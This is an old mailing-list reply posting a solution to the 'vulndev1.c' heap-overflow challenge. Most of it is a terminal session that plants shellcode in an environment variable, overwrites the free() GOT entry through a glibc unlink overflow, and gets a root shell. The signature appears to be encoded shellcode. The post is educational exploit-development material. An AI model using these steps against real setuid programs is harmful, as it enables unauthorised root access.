Re: vulndev1.c solution (warning SPOILER)

[Kenji Cronos <matrix () phiral com>]

On Wed, 14 May 2003 16:48:33 -0700
"Cameron Brown" <cameron () greyzone com> wrote:

> Jon,
>
> I don't know about yours, but my version of free() (glibc-2.2.93)
> trashes bytes 8-12 of the NOP sled as a side effect of the bogus unlink.
> If I execute this trash, it acts like a call into bad memory and I
> segfault.  Fortunately, I found I can avoid this by adding a 12 byte
> jump ("\xeb\x0c") at the front of the NOP sled.
>
> Just though it was worth mentioning.

Yup, you're right..  I tried doing the same thing on different system and ran into that problem... had to put a jump in 
there..   I guess I just got lucky on my laptop the first time..  also, when exploiting on the command line.. \x0c can 
screw things up since it's the form feed character.. so here I just jumped over a little bit more..

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*
0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free
080495f8 R_386_JUMP_SLOT   free
matrix@overdose vuln-dev $ pcalc 0xf8-12
        236             0xec            0y11101100
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# 

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP

Attachment: _bin
Description: